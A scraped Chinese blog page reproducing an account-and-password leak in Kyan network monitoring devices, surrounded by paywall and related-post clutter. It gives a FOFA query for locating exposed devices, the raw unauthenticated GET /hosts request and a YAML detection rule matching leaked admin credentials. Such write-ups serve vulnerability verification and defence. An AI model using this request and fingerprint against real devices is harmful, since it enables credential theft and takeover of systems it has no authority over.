Kyan网络监控设备hosts账号密码泄露漏洞（含批量验证poc）

今天晚上早睡觉

已于 2024-04-03 15:18:43 修改

阅读量234

点赞数

CC 4.0 BY-SA版权

分类专栏：漏洞复现文章标签：网络安全 web安全

于 2024-04-03 15:18:34 首次发布

本文链接：https://blog.youkuaiyun.com/weixin_43567873/article/details/137346960

漏洞复现专栏收录该内容

363 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

Kyan网络监控设备被发现存在安全漏洞，允许攻击者获取账号密码和后台权限。建议用户更新官方补丁以修复问题。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞描述
Kyan网络监控设备存在账号密码泄露漏洞，攻击者通过漏洞可以获得账号密码和后台权限。
fofa
app=”Kyan设计”
漏洞复现

GET /hosts HTTP/1.1
Host: 
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

检测poc规则编写

params: []
name: Kyan网络监控设备hosts账号密码泄露漏洞
set: {}
rules:
- method: GET
  path: /hosts
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"UserName=admin") && response.body.bcontains(b"Password=")
g

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

订阅专栏

漏洞复现|Kyan密码泄露/命令执行漏洞

失心少年

06-29

930

Kyan网络监控设备存在账号密码泄露漏洞，该漏洞是由于开发人员将记录账户密码的文件放到网站目录，攻击者可通过访问目录获取Kyan网络监控设备账号密码，进入控制后台。该系统存在密码泄露及多个远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。

Kyan网络监控设备license.php远程命令执行漏洞（含批量验证poc）

weixin_43567873的博客

04-03

134

Kyan网络监控设备license.php远程命令执行漏洞（含批量验证poc）

参与评论您还未登录，请先登录后发表或查看评论

Kyan 网络监控设备 hosts 账号密码泄露漏洞

孤桜懶契

04-05

1283

漏洞描述 Kyan 网络监控设备存在账号密码泄露漏洞，攻击者通过漏洞可以获得账号密码和后台权限漏洞影响 s ✅Kyan 空间测绘 d ⭕title="platform - Login" 漏洞复现 ✅登陆页面如下漏洞url http://127.0.0.1/hosts 个人博客孤桜懶契：https://gylq.gitee.io/time ...

Kyan网络监控设备账号密码泄露漏洞

chaojixiaojingang

04-19

2031

1.漏洞描述 Kyan网络监控设备存在账号密码泄露漏洞，该漏洞是由于开发人员将记录账户密码的文件放到网站目录，攻击者可通过访问目录获取Kyan网络监控设备账号密码，进入控制后台。 2.网络资产查找 Fofa：title="platform - Login" 3.POC http://xxx.xxx.xxx.xxx/hosts 4.漏洞复现 1）访问Kyan网络监控设备登录页面 2）访问POC，获取账号密码 3）利用获取的账号密码可直接进入后台 ...

2401_84300128的博客

05-01

226

📢📢为了操作简便，在这里我就不使用数据库，

Kyan网络监控设备run，2024年最新网络安全开发面试准备

2401_83620959的博客

04-17

356

【代码】Kyan网络监控设备run，2024年最新网络安全开发面试准备。

Kyan网络监控设备run.php远程命令执行漏洞（含批量验证poc）

weixin_43567873的博客

04-03

118

Kyan网络监控设备run.php远程命令执行漏洞（含批量验证poc）

Kyan网络监控设备time.php远程命令执行漏洞

weixin_43567873的博客

03-11

128

Kyan网络监控设备time.php远程命令执行漏洞

2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2)，网络安全音频面试

2401_84264244的博客

05-05

704

默认情况下， cron 任务被配置成了立即下载并安装所有更新，但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes，从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户（再次说明，你可以选择其他账户，如果你想这样的话），下面这些行也是必须的。安装完成以后，打开/etc/yum/yum-cron.conf，然后找到下面这些行内容，你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。

KayangEHR系统，后台程序不显示数据库新加的字段解决方案

qq_39104075的博客

08-04

597

在数据库里面加了一个字段，但是在后台程序不显示。解决方法：exec skydatarefresh 表名执行一下

嘉扬kayang eHR系统人员信息思维导图

02-27

方便于快速定位人员的个人信息，理解数据源头。为本人平时所整理

KongA 任意用户登录漏洞分析

why811的博客

09-28

2209

KongA 介绍 KongA 是 Kong 的一个 GUI 工具。GitHub 地址是 https://github.com/pantsel/konga。KongA 概述 KongA 带来的一个最大的便利就是可以很好地通过UI观察到现在 Kong 的所有的配置，并且可以对于管理 Kong 节点。

KonngA 任意用户登录漏洞

最新发布

qq_74349936的博客

10-18

887

Konga 是一个开源的 Web 用户界面（UI），用于管理 Kong API 网关。它提供了一个图形化界面，使得用户可以轻松地配置和管理 Kong 的各种功能，比如 API 路由、插件、消费者（Consumers）、密钥（Keys）等。

Kong未授权访问漏洞(CVE-2020-11710)复现

玄道的网安博客

03-05

6770

简介 Kong是开源的、"云原生"(cloud-native)的API Gateway应用程序，使用Kong gateway的各种插件可实现对访问流量的精细控制、访问鉴权。影响版本 Kong ：< V2.0.3 环境搭建使用docker进行搭建创建Docker网络拉取并启动PostgreSQL容器 docker run -d --name kong-database \ --network=kong-net \...

kong网关启用jwt认证插件

zhangshenglu1的博客

05-30

1368

认证流程：1、创建一个用户2、生成jwt的所需要的key和密钥3、在https://jwt.io/的生成jwt token4、启用jwt插件5、发送请求的时候携带jwt的token信息官方指导：https://docs.konghq.com/hub/kong-inc/jwt/configuration/examples/

CVE-2020-11710: Kong API网关未授权漏洞通告

爱国小白帽

04-16

4814

CVE-2020-11710: Kong API网关未授权漏洞通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月16日， 360CERT监测发现业内安全厂商发布了 Kong Admin Restful API网关未授权漏洞的风险通告，该漏洞编号为 CVE-2020-11710，漏洞等级：高危。 Kong API 网...

SRC挖掘中的权限绕过，导致的任意用户登录

qq_52579508的博客

09-05

284

在挖src中遇到的一个ndayhttps://konga-xxxxx.com/由于 Konga 使用了默认的密钥可以构造jwt来造成任意用户登录漏洞利用：先使用 jwt网站来构造https://jwt.io/#debugger-iooursecret 密钥生成的值：eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2...

关于Kong 网关的研究---详尽版--个人原创

qq_34560135的博客

06-10

4152

kong网关的学习与调研

kibana 漏洞收集总结

sojrs_sec的博客

12-31

8003

一：cve-2019-7609 命令执行 Kibana存在远程代码执行漏洞，影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码，包括反弹shell 访问 http://ip:5601/app/timelion 输入payload .es(*).props(label.__proto__.env.AAAA='...